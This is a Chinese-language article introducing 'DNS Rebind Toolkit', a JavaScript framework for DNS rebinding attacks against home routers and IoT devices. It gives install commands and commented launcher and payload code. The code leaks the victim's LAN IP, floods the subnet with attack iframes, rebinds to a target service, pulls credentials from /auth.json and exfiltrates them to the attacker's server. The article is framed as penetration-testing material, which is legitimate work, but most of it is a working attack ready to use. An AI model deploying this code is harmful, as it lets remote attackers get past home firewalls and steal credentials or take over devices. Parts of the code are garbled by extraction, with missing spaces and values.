
今天给大家介绍的是一款名叫DNS Rebind Toolkit的工具包,这是一款前段JavaScript工具包,渗透测试人员可利用该工具来创建DNS重绑定攻击。



DNSRebind Toolkit是一款前端JavaScript框架,可用于对存在漏洞的主机或本地局域网服务进行DNS重绑定攻击,类似的服务包括Google Home、Roku、SonosWiFi扬声器、WiFi路由器、智能恒温器以及其他的物联网设备。在这款工具的帮助下,远程攻击者可绕过路由器的防火墙,然后直接与目标用户家庭网络内的设备进行交互,并提取出隐私信息,在某些情况下他们甚至还可以直接控制目标设备。




git clone https://github.com/brannondorsey/dns-rebind-toolkit.git

cd dns-rebind-toolkit


npm install


sudo node server API及工具使用


1.    DNSRebindAttack:这个对象可以用来对包含漏洞的服务器进行攻击。它可以创建、管理并于多个DNSRebindNode对象进行通信,DNSRebindAttack所生成的每一个Payload都必须包含一个DNSRebindNode对象。

2.    DNSRebindNode:这个静态类对象需要包含在每一个HTML Payload文件中,它可以对目标主机所运行的服务进行攻击,并与相应的DNSRebindAttack对象进行通信。


1.    攻击者向目标用户发送一条指向恶意HTML页面的链接地址,并执行攻击。例如,其中launcher.html包含了一个DNSRebindAttack实例。

2.    目标用户点击了恶意链接,并访问了恶意页面,其中嵌入在一个iframe里面,页面此时便会触发攻击执行。

3.    DNSRebindAttack此时会搜索目标设备的本地IP地址(例如192.168.10.84),并根据这个IP地址来确定目标网络的IP地址范围(例如192.168.10.0-255)。

4.    launcher.html负责对目标子网的IP地址范围发动DNS重绑定攻击。

5.    DNSRebindAttack会在launcher.html页面中嵌入一个包含了payload.html的iframe,每一个iframe中都包含一个DNSRebindNode对象,用于对IP地址范围内的每一台主机(端口8008)进行攻击。



1.    一个HTML文件,其中包含DNSRebindAttack实例(例如launcher.html)。

2.    一个HTML文件,其中包含攻击Payload(例如payload.html),该文件需要通过DNSRebindAttack并根据目标IP地址嵌入到launcher.html中。

3.    一台DNS Rebind Toolkit服务器(server.js),用于传递文件并提取数据。








<!-- This script is a depency ofDNSRebindAttack.js and must be included -->

<script type="text/javascript"src="/share/js/EventEmitter.js"></script>

<!-- Include the DNS Rebind Attackobject -->

<script type="text/javascript"src="/share/js/DNSRebindAttack.js"></script>


// DNSRebindAttack has a static method thatuses WebRTC to leak the

// browser's IP address on the LAN. We'lluse this to guess the LAN's IP

// subnet. If the local IP is,we'll launch 255 iframes

// targetting all IP addresses from192.168.1.1-255


.then(ip => launchRebindAttack(ip))

.catch(err => {


// Looks like our nifty WebRTC leaktrick didn't work (doesn't work

// in some browsers). No biggie, mosthome networks are



function launchRebindAttack(localIp) {

// convert into array from192.168.1.0 -

const first3Octets =localIp.substring(0, localIp.lastIndexOf('.'))

const ips =[...Array(256).keys()].map(octet => `${first3Octets}.${octet}`)

// The first argument is the domainname of a publicly accessible

// whonow server(https://github.com/brannondorsey/whonow).

// I've got one running on port 53 ofrebind.network you can to use.

// The services you are attacking mightnot be running on port 80 so

// you will probably want to changethat too.

const rebind = newDNSRebindAttack('rebind.network', 80)

// Launch a DNS Rebind attack, spawning255 iframes attacking the service

// on each host of the subnet (or so wehope).

// Arguments are:

// 1) target ip addresses

// 2) IP address your Node server.js is running on. Usually

//    during dev, but then the publicly accessible IP (not hostname)

//    of the VPS hosting this repo in production.

// 3) the HTML payload to deliver to this service. This HTML file should

//    have a DNSRebindNode instance implemented on in it.

// 4) the interval in milliseconds to wait between each new iframe

//    embed. Spawning 100 iframes at the same time can choke (or crash)

//    a browser. The higher this value, the longer the attack takes,

//    but the less resources it consumes.

rebind.attack(ips, '','examples/payload.html', 200)

// rebind.nodes is also anEventEmitter, only this one is fired using

// DNSRebindNode.emit(...). This allowsDNSRebindNodes inside of

// iframes to post messages back to theparent DNSRebindAttack that

// launched them. You can definecustome events by simply emitting

//DNSRebindNode.emit('my-custom-event') and a listener in rebind.nodes

// can receive it. That said, there area few standard event names that

// get triggered automagically:

// - begin: triggered when DNSRebindNode.js is loaded. This signifies

//   that an attack has been launched (or at least, it's payload was

//   delivered) against an IP address.

// - rebind: the DNS rebind was successful, this node should now be

//   communicating with the target service.

// - exfiltrate: send JSON data back to your Node server.js and save

//   it inside the data/ folder.

// Additionally, theDNSRebindNode.destroy() static method

// will trigger the 'destory' event andcause DNSRebindAttack to

// remove the iframe.

rebind.nodes.on('begin', (ip) => {

// the DNSRebindNode has beenloaded, attacking ip


rebind.nodes.on('rebind', (ip) => {

// the rebind was successful

console.log('node rebind', ip)


rebind.nodes.on('exfiltrate', (ip,data) => {

// JSON data was exfiltrated andsaved to the data/

// folder on the remote machinehosting server.js

console.log('node exfiltrate', ip,data)

// data = {

//     "username":"crashOverride",

//     "password":"hacktheplanet!",

// }







下面给出的是一个payload.html文件样本,你可以在项目目录的examples/ payload.html中找到完整代码:




<title>Example Payload</title>




Loadthe DNSRebindNode. This static class is used to launch the rebind

attackand communicate with the DNSRebindAttack instance in example-launcher.html





.then(() => {},

err => {

// there was an error at somepoint during the attack


DNSRebindNode.emit('fatal', err.message)


) // remove this iframe by callingdestroy()

.then(() => DNSRebindNode.destroy())

// launches the attack and returns apromise that is resolved if the target

// service is found and correctlyexploited, or more likely, rejected because

// this host doesn't exist, the targetservice isn't running, or something

// went wrong with the exploit. Rememberthat this attack is being launched

// against 255+ IP addresses, so most ofthem won't succeed.

async function attack() {

// DNSRebindNode has some default fetchoptions that specify things

// like no caching, etc. You can re-usethem for convenience, or ignore

// them and create your own options objectfor each fetch() request.

// Here are their default values:

// {

//    method: "GET",

//    headers: {

//         // this doesn't work in all browsers.For instance,

//         // Firefox doesn't letyou do this.

//         "Origin": "", //unset the origin header

//         "Pragma":"no-cache",

//         "Cache-Control":"no-cache"

//    },

//    cache: "no-cache"

// }

const getOptions =DNSRebindNode.fetchOptions()

try {

// In this example, we'll pretendwe are attacking some service with

// an /auth.json file withusername/password sitting in plaintext.

// Before we swipe those creds, weneed to first perform the rebind

// attack. Most likely, ourwebserver will cache the DNS results

// for this page's host.DNSRebindNode.rebind(...) recursively

// re-attempts to rebind the hostwith a new, target IP address.

// This can take over a minute, andif it is unsuccessful the

// promise is rejected.

const opts = {

// these options get passed tothe DNS rebind fetch request

fetchOptions: getOptions,

// by default,DNSRebindNode.rebind() is considered successful

// if it receives an HTTP 200OK response from the target service.

// However, you can define anykind of "rebind success" scenario

// yourself with thesuccessPredicate(...) function. This

// function receives a fetchresult as a parameter and the return

// value determines if therebind was successful (i.e. you are

// communicating with thetarget server). Here we check to see

// if the fetchResult was sentby our example vulnerable server.

successPredicate: (fetchResult)=> {

return fetchResult.headers.get('Server')== 'Example Vulnerable Server v1.0'



// await the rebind. Can take up toover a minute depending on the

// victim's DNS cache settings orif there is no host listening on

// the other side.

awaitDNSRebindNode.rebind(`${location.host}/auth.json`, opts)

} catch (err) {

// whoops, the rebind failed.Either the browser's DNS cache was

// never cleared, or more likely,this service isn't running on the

// target host. Oh well... Bubbleup the rejection and have our

// attack()'s rejection handlerdeal w/ it.

return Promise.reject(err)


try {

// alrighty, now that we've reboundthe host and are communicating

// with the target service, let'sgrab the credentials

const creds = awaitfetch(`${location.host}/auth.json`)

.then(res =>res.json())

// {

//     "username":"crashOverride",

//     "password":"hacktheplanet!",

// }

// console.log(creds)

// great, now let's exfiltratethose creds to the Node.js server

// running this whole shebang. That's thelast thing we care about,

// so we will just return thispromise as the result of attack()

// and let its handler's deal withit.


// NOTE: the second argument toexfiltrate(...) must be JSON

// serializable.

returnDNSRebindNode.exfiltrate('auth-example', creds)

} catch (err) {

return Promise.reject(err)








usage:server [-h] [-v] [-p PORT]

DNSRebind Toolkit server


-h, --help            Show this help message and exit.

-v, --version         Show program's version number andexit.

-p PORT, --port PORT  Which ports to bind the servers on. Mayinclude

multiple like: --port80 --port 1337 (default: -p 80

-p 8008 -p 8060 -p1337)


1.    server.js:DNS Rebind Toolkit服务器;

2.    payloads/:包含了多种可直接使用的HTML Payload文件,可用于针对存在漏洞的物联网设备进行渗透测试;

3.    examples/:使用样例文件;

4.    data/:提取出的数据信息将保存在该目录下(方法:DNSRebindNode.exfiltrate(…));

5.    share/:存储了examples/和payload/目录中HTML文件共享的JavaScript文件;
